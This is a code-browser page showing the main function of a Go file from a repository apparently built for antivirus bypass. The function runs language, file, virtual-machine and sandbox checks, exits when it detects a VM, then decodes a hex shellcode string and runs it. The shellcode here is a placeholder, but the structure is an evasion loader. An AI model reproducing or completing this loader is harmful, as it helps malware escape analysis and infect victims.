MCPcopy Create free account
hub / github.com/TideSec/GoBypassAV / main

Function main

SandBox/main.go:204–214  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

202 return charcode
203}
204func main() {
205 check_language()
206 check_file()
207 check,_ := check_virtual()
208 if check == true{
209 os.Exit(1)
210 }
211 check_sandbox()
212 sccode := ScFromHex("000111222333444")
213 Run(sccode)
214}

Callers

nothing calls this directly

Calls 6

check_languageFunction · 0.85
check_fileFunction · 0.85
check_virtualFunction · 0.85
check_sandboxFunction · 0.85
ScFromHexFunction · 0.85
RunFunction · 0.85

Tested by

no test coverage detected